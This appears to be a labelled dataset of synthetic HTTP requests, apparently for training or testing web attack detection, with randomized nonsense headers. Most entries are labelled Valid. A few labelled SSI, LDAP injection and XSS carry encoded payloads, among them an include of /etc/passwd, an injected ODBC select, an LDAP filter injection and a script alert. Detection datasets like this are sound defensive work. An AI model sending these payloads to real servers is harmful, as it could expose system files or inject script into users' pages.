~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2677
Start - Id: 2710
class: Valid
GET /mEeenauexuaodm/ioUjQNyc_za3FNsF1E/RWBPGM-O8adminhc/ioa6EnnipsThaF.bin?dooYNrmcHr=ge4ieePnnra2&unaIf1feileorni=tu&ratmshac=e8&i0ong=78&m0ch1eev=5852408&dcotegi=no&juRdafetIhH=gdooar3inrOheegel HTTP/1.0
Host: www.ssanmLe.cz
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.4
Accept-Language: *;q=0.8
Cache-Control: max-age=96308
Client-ip: 118.196.176.82
Cookie: zeIodpc=beZebodsutyAer;ph36e=8;daK=unye4a%uxtermaewrna;bi4jcht0orqn=15590;ahLTo=3536;be=pwWeJ
Cookie2: $Version="825"
Date: Sun, 25 Apr 04 03:46:59 GMT
ETag: "tItqd5tA_J@DpVg"
Expect: 100-continue
From: 5ars@nlasbuse7.gov
If-Modified-Since: Fri, 06 Feb 04 01:22:25 GMT
If-Unmodified-Since: Tue, 12 Aug 08 03:33:59 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 11 Nov 07 11:30:03 UTC
Max-Forwards: 0800
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: hnknte 6dhe=ailltedl
Authorization: TDiak nmect4=aIienlh
Range: 800-526712,0803-
Referer: /ettri/aOq2iv/tboe/hnes2.mdb
TE: gzip;q=0.8,trailers,deflate;q=0.2
Trailer: Warning
User-Agent: Mozilla/6.2 (Machintosh; U; PPC Mac OS X 4.4; ra-on; rv:9.3.6) Gecko/57174490
UA-CPU: 68000
UA-Disp: 153,380,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 486x934
Via: Nvgmhr/2.2 14.177.150.139, 1.7 141.200.102.216, FTP/6.2 179.46.11.20
Transfer-Encoding: compress
Upgrade: foys/2.8, sSboa/7.3, alt/9.7, arhxe/9.3, g5ee4a/9.9
Warning: 618 www.isvroab.html "hmysacdeseenneluAtm" "Fri, 02 Jun 06 09:20:31 CET"
X-Forwarded-For: 199.141.63.236
X-Serial-Number: 053261538285243
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2710
Start - Id: 1072
class: Valid
GET /7R60Bl2xp6vbQxvaQ/ot/t7FkD2.F86RhN_cM.b/aqfxzStFbznV/sinxKjm.mw3XH/iw/eMt8/mLuauTy.aspx?eineahpithm=2s8+lig5uwinnttgcfssoh&vhttp8WfWS=ari%3B&I8hihSe5=sd%3B&ldunestc=22802417&g8lnrEa=dh+&rsFNnjtlsdhrt=5_i&RbBl=nmcAseaccess_logc%3Dlis&otordnot=6qjIg&ieDdr4lr2xi=3 HTTP/1.0
Host: www.ststee.gov
Connection: yusdt
Accept: */*;q=0.5
Accept-Charset: *;q=0.6
Accept-Encoding: gzip;q=0.3, compress, identity
Accept-Language: ouu-n, niFio-enn;q=0.5, dlcemhE-eh9y, dvcr-ae, ww-h
Cache-Control: e8IiF='Nlc4eHy'
Client-ip: 223.62.200.181
Cookie: nhgqz3yebn=904;hl=3;lwfigfyodays=9604;nbxcssioqehol=8539475;4te=Tr( faNncs ii 
Cookie2: $Version="02"
Date: Thu, 01 Apr 10 21:14:18 UTC
ETag: W/"kEelleoKYf-mADbtR9E"
Expect: 100-continue
From: hsrtboi@onni.cz
If-Modified-Since: Sat, 14 Jul 07 17:08:30 CET
If-Unmodified-Since: Sat, 09 Aug 08 09:21:25 GMT
If-Match: "yKz8YYdIzLQgfxbuv"
If-None-Match: "jIUbaBvc.9fa6ir@OT"
If-Range: Mon, 11 Sep 06 20:50:25 CET
Max-Forwards: 152
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: NTLM aXRyZXNkbzRvcnhyY2VleXR0ZW1ybnNhRXplbnphaTdSNW9SYWVpYmVuNg==
Authorization: NTLM NWh4cjgxdW5sYXByYWllZ1NpcnppaTR5bXhFYXI1ZmV3aWRvb3dybXA=
Range: 46238-
Referer: http://www.zoeloie.st/fatn/ieAzG/ay0at/mhail/ahoumpie.jpg
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: oUqb (uqSL5Yvv; p.hoF1hLE; oOd5TeM@a; ip5fIX)
UA-CPU: MIPS
UA-Disp: 465,0552,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 5208x202
Via: FTP/4.4 www.ssehc.css, 6.6 44.40.212.216:9141
Transfer-Encoding: identity
Upgrade: gt2/2.3, oreoE/3.8, ntnr/0.0
Warning: 681 241.65.101.209 "Bne8meaetNbm1aowme3" 
X-Forwarded-For: 65.243.221.166
X-Serial-Number: 50030197738095040430
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 1072
Start - Id: 28264
class: Valid
GET /jntsdauNhauere/Pt/hnjllutrna/nx8T7C2vC8jlafwU/e1BuoLXD0WrYYCi/4R8PGa/mewimsaerpr/t0VdD.0OX/x61nbhreoohoer.gif?pq4bB=ahtrhtelnethtsua%3De%3Dl&Y2OMv6RL8wg3=r_I&anVjaoUm=22285940&Oxterm_v3ib7Q=+AddropEaetOi&saso=7&iU7t0blsDUsH=sshw&i1gh5daluhersnl=84652034 HTTP/1.0
Host: www.rkiw8acft.gov
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-3
Accept-Encoding: *;q=0.5
Accept-Language: 6op2-olico;q=0.1
Cache-Control: no-store
Client-ip: 213.90.3.226
Cookie: hra17mhnr=39;_DhF=stg
Cookie2: $Version="5"
Date: Thu, 04 Jun 09 07:56:05 GMT
ETag: W/"BFT5uPOkv_JJlmlh8IH5"
Expect: ibTp1t=svzsd
From: sse6d@agdeoarrhr.com
If-Modified-Since: Sun, 20 Feb 05 02:55:53 UTC
If-Unmodified-Since: Sun, 07 Oct 07 18:09:34 CET
If-Match: "EIkOcSqB.uWLL3Tqqg"
If-None-Match: "gUIghAt2yiMnLUIfE"
If-Range: *
Max-Forwards: 7
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: eotn c3ei=whZbs
Authorization: NTLM bTNtaWVzYVJsb2VnZnJxNGN3ZWp0ZTFuTzJ5bG9pbjY3cmhlbWluYXJvQzFVaWhl
Range: 29956-,-15205
Referer: http://www.gmns.st/jnzpgmmo/ri3uaac/deEdDaap/eshnv.avi
TE: trailers,deflate
Trailer: From
User-Agent: ddIesi (wUbqoJLxy; locUBzkOQm; hJ0-OZAx; lv0S.8M)
UA-CPU: Sparc
UA-Disp: 5435,696,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 0895x834
Via: 5.2 www.gnrup.gif, 2.4 www.oB8suldr.gif, 1.1 www.wBl1.htm
Transfer-Encoding: deflate
Upgrade: toeSy/0.2, eveg9e/9.5
Warning: 334 0.64.248.123:76205 "otiprr" "Wed, 15 Aug 07 02:30:33 UTC"
X-Forwarded-For: 209.67.183.110
X-Serial-Number: 59455788287965152
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28264
Start - Id: 39796
class: SSI
GET /ughfasynUsfrq8etss/neea/KTtmppositionh.jpeg?iojtEio00h01yR=%3C%21--%23include++++virtual%3D%22%2Fetc%2Fpasswd%22+++++--%3E&yHthuHven=56778952 HTTP/1.0
Host: 143.141.161.18
Connection: nrnrshe
Accept: image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: m5ozM-Lrt;q=0.1
Cache-Control: min-fresh=5
Client-ip: 252.98.95.119
Cookie: Zi_6binMcAg=432;ehgneeet6=elnetcsnstr-eu
Cookie2: $Version="9"
Date: Sun, 20 Sep 09 07:17:08 UTC
ETag: "1MI3X5pRIo3ZW19eTlb1"
Expect: 100-continue
From: otit3le@ijlhneot1o.com
If-Modified-Since: Mon, 29 Aug 05 21:29:12 GMT
If-Unmodified-Since: Mon, 02 Jan 06 23:02:24 UTC
If-Match: "bHJKkxda8xbD6vUFfSP"
If-None-Match: *
If-Range: "JZV1muKv98Sl-si9B"
Max-Forwards: 6335
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest nc=Ca5d26eD
Authorization: Digest uri=http://www.wrOk.net/hoodei/i9fdm/hosOp8.rar
Range: 2975-
Referer: http://Raf3.st/2nid/lewef/iTt6kHol/sallue3/cagte.zip
TE: trailers,gzip,trailers
Trailer: TE
User-Agent: hoatiliai/0.9
UA-CPU: Sparc
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 468x7869
Via: HTTP/6.3 www.tiCo8.jpg, apsspd/3.6 230.233.79.136, 0.6 99.76.109.82
Transfer-Encoding: gzip
Upgrade: oLt/5.9, tEgb/6.9, 6laet/2.7, faare2/0.4, vst20/6.5
X-Forwarded-For: 197.171.250.97
X-Serial-Number: 39977076241136
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39796
Start - Id: 40919
class: SSI
GET /oVtdiAiD/DftpS8OFVB2orx/msoo5rec4ess/aPpH-/1r.exe?Raatd0aiw2aer=%3C%21--++%23odbc+statement+++%3D++++%22select+++++enw1nh%2C++ts%2C+Lagp47di+from+++oan2sh+order++++by+9%2C++377%2C+6%22++++--%3E&roeTaSoMt=r3bJJfIvOCr&snm4tpAher=gse&daQiponI4worbaU=like2oem HTTP/1.1
Host: www.xpiariae0s.be:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 164.186.250.7
Cookie: ihleAeef=h5WjyVFoBhgA;nsrivr45s=742;osrp6=c9X_L0;hcevkfqttvmsita=e;mMirom7ijt=ipnhnMdrpxijnc
Cookie2: $Version="608"
Date: Mon, 19 Dec 05 23:03:02 GMT
ETag: "4DOTsaKeuKe20mWmkYac"
Expect: 100-continue
From: tmenra3@rdaoespvt.it
If-Modified-Since: Wed, 30 Sep 09 23:19:52 UTC
If-Unmodified-Since: Sun, 27 Dec 09 16:12:54 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 9.9
Pragma: z='x5e'
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM aWZiaDZzRWVmbzBldHg0YmNla3d0dGUybmVpb3locDRpZndvcg==
Range: 333780-330
Referer: http://www.moh3tn.ch/tex4aaur/xtsGos/Adoe2/ojgmnoo.pdf
TE: trailers,trailers
Trailer: Accept-Encoding
User-Agent: sdhmbi/9.6.5
UA-CPU: MIPS
UA-Disp: 613,8082,8
UA-OS: Win98
UA-Color: color16
Via: 0.2 www.e0bdcse.html, zzrd/7.3 www.trpsmMtb.png:94
Transfer-Encoding: identity
Upgrade: Oeoe/7.5, tls/2.6
Warning: 086 61.20.174.151 "hej5T2phoa6l2adseC1t" 
X-Forwarded-For: 60.122.216.106
X-Serial-Number: 163741114628927
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40919
Start - Id: 25338
class: Valid
GET /cjlgjuznH2SkKej/1VfayEzcsKjkoBxN/hYoceVHLlD/hySctjT/odDL82@Zyx@KA6DTQ0/qJcvT.cfm?6dehiceui=oHnpAkBR6UmT&eaygqotf9geg=4252962196&o4Eethoshn=95&enCewdcnf=9tTeRfEAu HTTP/1.1
Host: www.tldmnykk.net
Connection: okMrq
Accept: image/*;q=0.7, image/*;q=0.6
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: iDlru-tootew, fou-lmor;q=0.1, ecM-o, Rs-iiw, hiutu-edo;q=0.3
Cache-Control: no-cache
Client-ip: 5.249.73.152
Cookie: li=sV7;ec6liujgii=nZrMU;drop4WVjpositionhtpassGr=r0re
Cookie2: $Version="5"
Date: Tue, 07 Apr 09 12:23:42 CET
ETag: "k0yDpisrt@FrTBjdjEE"
Expect: 100-continue
From: hait@1onahThh5t.net
If-Modified-Since: Tue, 15 Apr 08 04:54:04 GMT
If-Unmodified-Since: Sat, 24 Feb 07 13:34:26 CET
If-Match: *
If-None-Match: "y09d.C6DRtnruNA.U9W"
If-Range: *
Max-Forwards: 993
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.rn0rrh.it/uox5plt/dRe5wf1t/sEfn/doaoli7/aepASr.cfm
Authorization: Digest cnonce="ifohe"
Range: -5,9601-,-779
Referer: http://www.sEln.org/ellsec.gz
TE: deflate
Trailer: Connection
User-Agent: t3suHY http://www.rDo3crs.be
UA-CPU: 68000
UA-Disp: 645,174,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3370x895
Via: 0.0 77.113.241.143
Transfer-Encoding: gzip
Upgrade: ato/3.1
Warning: 507 www.m5ctauut.htm "aje7owrp58as" "Wed, 13 Jan 10 11:26:34 GMT"
X-Forwarded-For: 117.22.170.105
X-Serial-Number: 29493838100482691776
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25338
Start - Id: 37181
class: LdapInjection
GET /ye3BobSc4sRrJqIo/yS55pMsuPIGzv61T5/ibm08iVJ0dZdPiSBLf9S/kltOImjee5aXthloa/epnRUKHw/tienUsau1ri/Ppasswd0pcopy/krsr/Mhaving1/obetweentia/acns/65n.jsp?aes7to=p_xMCpZ0&eeetro6i6r2U=eehrp&tebjSear=2rti%29%28+++%7C+%28whT7%3D*%29&Iei=0033764378&aaeLOhhrNp=oFAKw&Qi6JHoptjnf7=h7%5Daq&yoee2Sair=48947372&hErmKZi=fne%3E3&9thi4Dmtoi=47988957&pcl=6 HTTP/1.0
Host: 81.12.69.49
Connection: nsio8u
Accept: application/x-tar
Accept-Charset: cp-932;q=0.6, x-mac-hebrew;q=0.1
Accept-Encoding: 
Accept-Language: *
Client-ip: 234.176.71.122
Cookie2: $Version="2"
Date: Thu, 27 May 04 10:17:58 CET
If-Unmodified-Since: Sun, 14 Mar 10 17:17:51 UTC
If-Match: "NW9zVwThlKKV0LgP"
Max-Forwards: 7931
Referer: http://x0iomct.be/6wts9w/ergoxph/ft9a/wcdnais/imOsl.mp3
TE: chunked,gzip
User-Agent: Mozilla/9.5 (compatible; MSIE 9.1; Open BSD i386; wnxojd)
Via: FTP/2.1 www.bezcie.gif

null

End - Id: 37181
Start - Id: 26335
class: Valid
GET /wCHeoCbB6uBOR0/btoi8kp/jO/cmnre3GIqnr/ynoidsuaAssh/pgQGMXkTfpeY./en13omyziU5.html? HTTP/1.0
Host: www.iluenD.it
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: ly-he, mt-deUowdte, iv-ruwrljn
Cache-Control: no-cache
Client-ip: 137.228.228.23
Cookie: l09e4hefb7=7302770;LdeK=blsrGR;Sodoidr=and;97BmochapLO@-T=hqe45rAxc/t
Cookie2: $Version="54"
Date: Tue, 19 May 09 19:13:14 GMT
ETag: "NpRO8Ovy3VT9Iols-"
Expect: 100-continue
From: gitotesj@ijetLdns9r.st
If-Modified-Since: Tue, 17 May 05 12:35:48 CET
If-Unmodified-Since: Fri, 29 Aug 08 17:07:47 GMT
If-Match: "V934CP8zTMRyPv-msk"
If-None-Match: "3rwRK9@0axq7jRXZ"
If-Range: Wed, 28 Jun 06 03:01:03 CET
Max-Forwards: 5
MIME-Version: 9.2
Pragma: i=st
Proxy-Authorization: Basic bmVyM2J1cjppRWlI
Authorization: Basic M2pkSWwyYWU6a2JlaHNvbGg=
Range: -954,195324-0
Referer: /x2std/laoibe/dadtE.conf
TE: chunked;q=0.2,chunked;q=0.3
Trailer: Pragma
User-Agent: nsw4etr6washLnnn
UA-CPU: StrongARM
UA-Disp: 417,8223,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 917x537
Via: HTTP/6.5 www.axayasei.png, HTTP/6.5 www.ishJccef.css
Transfer-Encoding: compress
Upgrade: roy/9.0
Warning: 090 225.220.154.3:937 "oeyiszNeBarwra0etot" 
X-Forwarded-For: 113.183.151.252
X-Serial-Number: 8772849575
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26335
Start - Id: 34497
class: Valid
PUT /aDOXlfCK0O/Nu7qDegoseoarda/rrxtoRsoeynlmtrO/KX/eZ@T4JHM-SlmKBeNakN.php4? HTTP/1.0
Content-Length: 107
Content-Language: tntrra,jrb
Content-Encoding: gzip
Content-Location: http://www.ihpec.biz/ourrlS/56utnr.gif
Content-MD5: MzVldGVyZThlbmhzb2lzTw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 05 Mar 09 18:17:07 CET
Last-Modified: Fri, 26 Feb 10 24:26:15 GMT
Host: 193.45.90.96:80
Connection: close
Accept: audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: benmet=qtw
Client-ip: 96.49.197.35
Cookie: id=a~0crcmda reascript6e]r$un;w6mh=c6tTb.v2X;Ro=aolla7
Cookie2: $Version="08"
Date: Sat, 04 Oct 08 11:37:55 UTC
ETag: W/"zXkqap1UykJ3qZ_m7Y"
Expect: ei9Ox7pc
From: doesa@0psfre.gov
If-Modified-Since: Sat, 18 Aug 07 14:32:51 UTC
If-Unmodified-Since: Fri, 05 May 06 14:31:39 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 057
MIME-Version: 1.0
Pragma: tlen='prwMt2'
Proxy-Authorization: 8bnrqi t6sehpaY=rejt
Authorization: Basic ZWFscnRzOmVlZGhodFg=
Range: 003-49,-300,-23
Referer: /uouc/nt0tnfE/ph4nt.msf
TE: chunked
Trailer: Upgrade
User-Agent: siufihFla (l7t0i-lhLe; oYxcYQ1Kk)
UA-CPU: MIPS
UA-Disp: 3627,6324,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 7089x0052
Via: 0i4h/5.4 74.12.215.153, un8/6.6 www.ptnlahir.htm, 6.3 39.106.173.99:065
Transfer-Encoding: Ebcfb; 5ebau=blocel
Upgrade: lnanIi/4.1, w0wfaa/7.7
Warning: 855 158.106.17.233:019 "warne" "Sun, 23 Sep 07 02:08:13 GMT"
X-Forwarded-For: 63.206.208.126
X-Serial-Number: 16107825761
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~

B7estttdpe5y=f\O&lewaetrm=478030178&ediaz=ege&adtyxd=8334&8oz6select4=mK3.dU&ao=20&Uj6UYaobject6Htx=6BlrX

End - Id: 34497
Start - Id: 9861
class: Valid
GET /fsNLfezqciH7ERk/j5-cnebxxI/6PBbSLzNZRgQr/@u1-GOJUSG8YxM/tu0anOkI7Tx@@/cGtgmU7p5noom/yS.jpeg? HTTP/1.1
Host: www.nEs5ilYnj.gov:399
Connection: 8nhNhie
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: orYg-beeAps;q=0.9, etIsni-dmsCe;q=0.1
Cache-Control: max-stale
Client-ip: 117.106.21.204
Cookie: oyelc0HjlOaaau=840016;x33%uAygc=686;sedihanriilp=nwfd
Cookie2: $Version="53"
Date: Sat, 20 Jun 09 14:08:57 GMT
ETag: W/"JvZhCo@X.g-smH3l"
Expect: fsorb=ooEyhv
From: eysn4@teOuatxl.org
If-Modified-Since: Mon, 19 Jul 04 21:07:02 GMT
If-Unmodified-Since: Sat, 21 Jul 07 23:54:04 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5498
MIME-Version: 2.6
Pragma: iyeri='0q8t'
Proxy-Authorization: Basic cmhVbmVyYXA6aGd5bTFoRUU=
Authorization: Digest qop=auth-int
Range: -116,600-315,197733-5
Referer: http://s3tsbndo.biz/udtzudO/bAmiut/64tus5rU/oeem.aspx
TE: trailers
Trailer: If-None-Match
User-Agent: hyicrynoas/9.5.7.9.5
UA-CPU: MIPS
UA-Disp: 1962,9364,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 803x940
Via: FTP/2.1 www.bpFks.shtml:23703
Transfer-Encoding: deflate
Upgrade: dsi/0.4
Warning: 812 www.raItj.jpg "oaso85cantolse0N" "Sun, 16 Nov 08 15:47:55 GMT"
X-Forwarded-For: 34.215.180.93
X-Serial-Number: 09946739061718
----: ----------------
~~~~~: ~~~~~~~~~~

null

End - Id: 9861
Start - Id: 7209
class: Valid
PUT /trh/eepdots/dstbE/axXbfrkov07Nfsa/ieKUtesetHonSet/Q8Kc6/lhx.jpg? HTTP/1.1
Content-Length: 98
Content-Language: ibh,a5oarwo1
Content-Encoding: deflate
Content-Location: /srrrQcNe/nreHaX/sls7oeO.jpg
Content-MD5: c29pcnRkYVdadXRsYWFvQQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 24 Feb 08 13:54:12 CET
Last-Modified: Thu, 05 Nov 09 14:35:42 CET
Host: 242.24.8.142:80
Connection: sortpec
Accept: */*
Accept-Charset: x-mac-roman;q=0.2, cp-932;q=0.1, gb2312, iso-8859-15
Accept-Encoding: *;q=0.0
Accept-Language: aqa-atn6, agDhai-c6i;q=0.9, e-e;q=0.7, ddeuqa-Resz;q=0.3, g-ljs
Cache-Control: no-transform
Client-ip: 255.188.160.16
Cookie: eaja=sF.9Aeh2r9M;acceptgI3E3oMrcp=rr7eljcu8h
Cookie2: $Version="9"
Date: Sun, 10 Jan 10 12:32:16 CET
ETag: W/"NWIylEm8u9@rYrRo"
Expect: 100-continue
From: eklcds@EusetgdssJ.biz
If-Modified-Since: Fri, 08 Aug 08 09:04:56 GMT
If-Unmodified-Since: Wed, 28 Dec 05 12:40:38 UTC
If-Match: *
If-None-Match: *
If-Range: "WEPZSmE3.4hB5b_"
Max-Forwards: 179
MIME-Version: 4.0
Pragma: nsobE=Eta
Proxy-Authorization: Digest nc=9f15Ac7e
Authorization: Basic dHJvaHRJYzpzZGVkdA==
Range: 835-,-3,7-0
Referer: http://www.eauce.de/te7emdT/hislao4c.txt
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/2.8 (X11; U; Open BSD i586 2.9; ie-ro; rv:6.7.9) Gecko/44967171
UA-CPU: 68000
UA-Disp: 5578,6674,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 629x010
Via: 1.6 139.236.199.210, 6.1 5.65.96.153, 9.7 142.158.202.96:57351
Transfer-Encoding: x73oar
Upgrade: nctee/4.4, seyc/3.3, leTnv/8.7
Warning: 483 60.145.138.165 "aoanb" "Fri, 09 Dec 05 17:14:05 GMT"
X-Forwarded-For: 62.39.133.239
X-Serial-Number: 741957676224840602
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

auaiss=lRahtpass/ohfekh Adwdcopyw[t&ZL@sh=bvarONetcsock_streamsteetno2&wowotuittigev=722872064

End - Id: 7209
Start - Id: 4400
class: Valid
POST /rhoetoqhr1ciyjjwlDQ/tRDadyrmwvqwU/sx1HE/birgktr/6MZVVky8M2Dghf/hxC/0sAhagei5banb/oim/hO0qHbQfrGkkxTOkp/AXcopyxml0T.dll? HTTP/1.1
Content-Length: 206
Content-Language: coyeph,hbEt,dadsr0
Content-Encoding: deflate
Content-Location: http://A5Gd07.it/4sth/roevsog/edyyFeca/hs6ir/eH63rers.pdf
Content-MD5: c3RzdE5mdlRLbmpldTllYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 09 Apr 06 06:14:01 CET
Last-Modified: Sat, 17 Feb 07 17:07:48 GMT
Host: www.aesl4f3n.be
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: us-ascii, big5;q=0.4, iso-8859-15, x-mac-greek;q=0.0, iso-8859-1
Accept-Encoding: *;q=0.2
Accept-Language: W-5weese, a-iDeeao;q=0.8, 8n-anexl;q=0.7
Cache-Control: no-cache
Client-ip: 62.76.201.243
Cookie: jothe4owai=96685763;XrnxsMfntg=we3sn~ie
Cookie2: $Version="60"
Date: Sat, 11 Oct 08 08:09:25 CET
ETag: "xl9oo@78lZOG_g@aFa_"
Expect: elloeo=mneearec;pcaLi=ysyKwhe
From: 48dwasgl@dariiet.it
If-Modified-Since: Sun, 04 Jan 09 06:54:52 GMT
If-Unmodified-Since: Tue, 19 Jun 07 18:24:25 GMT
If-Match: *
If-None-Match: "@_A@hW9rNHznrxlv5"
If-Range: *
Max-Forwards: 4776
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: dmpi nsar=Oat0ll
Authorization: gra1 jeaessa=uefui
Range: -090
Referer: http://mobseEe.gov/ossecH2/cA6ouCia/SEoepn.jsp
TE: deflate;q=0.8
Trailer: Upgrade
User-Agent: Mozilla/8.6 (Windows; U; Windows NT 2.0; uw-9e; rv:1.4.5) Gecko/24673065
UA-CPU: Sparc
UA-Disp: 7270,8918,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 6849x3464
Via: FTP/1.3 www.mD1enua.tiff, 8.4 www.b3oj6.jpeg:6247, 0.1 www.gnaecAtt.css
Transfer-Encoding: deflate
Upgrade: idest/4.3, teutsr/9.1
Warning: 322 33.61.145.11 "iwyoufhz" "Thu, 15 Mar 07 06:25:34 UTC"
X-Forwarded-For: 108.68.118.250
X-Serial-Number: 5443838
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

asrg5c8usoitmE=SwEu&kAshlaieU=tT E&5oXLOGPXXh1=2ic@LiCQBq80&XsZvC9Pr=$)e;9&Dgtoriaro=71239473&7gv4=7095561&ioteG=89265&8ttknlISlnm4=192&tn3nbi7wH=tQlH&d9nagape=558533098&a5sl=y@wX8x@CA&ee=411376

End - Id: 4400
Start - Id: 12367
class: Valid
GET /tA0traH1m3/bV22pHb.Mknc26YP/kSperljFfhBkiBdT/aPwFxD.nsf? HTTP/1.1
Host: 203.115.157.0
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.3
Accept-Encoding: gzip
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 102.169.186.69
Cookie: ot793cfat6ln6= l&ieilo;hsownepttrerl=spositionn l%;g5SsedEiao3lC=6872045;RmS@=sraeeee92nPi
Cookie2: $Version="226"
Date: Mon, 11 Feb 08 12:00:12 GMT
ETag: W/"iCE5UJcs-dA3J496"
Expect: 58eo=J2ehihen;ewaeiah=i5ci13a
From: Tnnrip@eam1hohoia.org
If-Modified-Since: Sun, 25 Jan 09 06:40:30 GMT
If-Unmodified-Since: Tue, 01 Apr 08 04:37:00 GMT
If-Match: "GE4kt_MdEa8xoPk"
If-None-Match: "CRK-6t4fStWmlK-aWbV"
If-Range: Tue, 20 Apr 10 23:29:36 UTC
Max-Forwards: 29
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: NTLM c2FCOXNTaXRydUJvWHRlY3poZEQybmF0c3lkdGNlNGNkdG9qZWJEV3luZWxiaXR2
Authorization: 19Orw ee43=sMeyL
Range: 662-4,8147-,483669-546
Referer: http://AMEo.ch/ubtnno4/thiaEnEN/eGhod0o/2eer6otm/ss3f.php4
TE: gzip,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/8.3 (X11; U; SunOS sun4u 7.4; oa-22; rv:7.0.3) Gecko/05340774
UA-CPU: 68000
UA-Disp: 3711,172,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8258x863
Via: 4.4 201.162.168.66
Transfer-Encoding: t1qhe
Upgrade: fqto/4.8
Warning: 103 90.190.112.163 "NnychezntNtlHfe" "Fri, 28 Nov 08 06:04:52 CET"
X-Forwarded-For: 15.44.254.140
X-Serial-Number: 250138591797251529
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12367
Start - Id: 47854
class: XSS
GET /nge/.fr/ei4CDc3ofFanm/vFKJIIGClRlSusr_0/dnsiboaosy0dgbecjb/Rh6nVGTBIlocation1A1/si/ys/eooenueansunteci/oiredEnnem/@gu.dll?ic=%3Cscript++++%3Ealert+%28%27wEmht9t.ooIuos%27%29%3C%2Fscript++++%3E&aiihrIgcygtaaf=iMRgFWw1&0Ed=peete3i&8aoih=e%7E8rwhdn%26%2Fea7&9cdii=8066&ayyp0dn=prgvTehr&OVoo=aNyr HTTP/1.1
Host: www.sirphd.st:80
Connection: close
Accept: */*
Accept-Charset: windows-1250;q=0.4
Accept-Encoding: 
Accept-Language: h-epwhe;q=0.9
Cache-Control: no-store
Client-ip: 253.131.220.138
Cookie: eathw2=2endnfha5baUaao;6d=ajol;vyUlw=711982;eostdsaot0adeg=ilolwXy-f;xterm4-5=  a esIea0efu
Cookie2: $Version="459"
Date: Thu, 24 Jul 08 11:10:22 UTC
ETag: W/"LURUItJivcqELL-hp6D3"
Expect: mrthhp=AsnbEEk;eeuvr
From: tioExt@xadhwC.ch
If-Modified-Since: Wed, 01 Jun 05 22:15:51 UTC
If-Unmodified-Since: Wed, 10 Aug 05 18:50:52 CET
If-Match: "bpC.jAKUt2HkyzhoKik"
If-None-Match: *
If-Range: *
Max-Forwards: 3913
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: aibnm 3nd5Ean8=1Tde
Authorization: e0thui ljyE=ret4ga
Range: 595606-7,222673-07
Referer: /pUleunSp/bquu6Ii/ne8nn/aciOhed/1ghiieVo.swf
TE: deflate;q=0.8,trailers
Trailer: Trailer
User-Agent: Mozilla/5.2 (X11; U; Unix 4.4; d3-8n; rv:0.9.1) Gecko/34679023
UA-CPU: x86
UA-Disp: 4309,162,32
Via: 7.9 www.tesnn.tiff:38
Transfer-Encoding: deflate
Upgrade: eceRm/0.3, e5aiw8/4.3, ahnzt/2.0
Warning: 626 136.170.222.193 "qysfxete3o" "Wed, 05 Sep 07 23:11:56 UTC"
X-Forwarded-For: 188.24.5.207
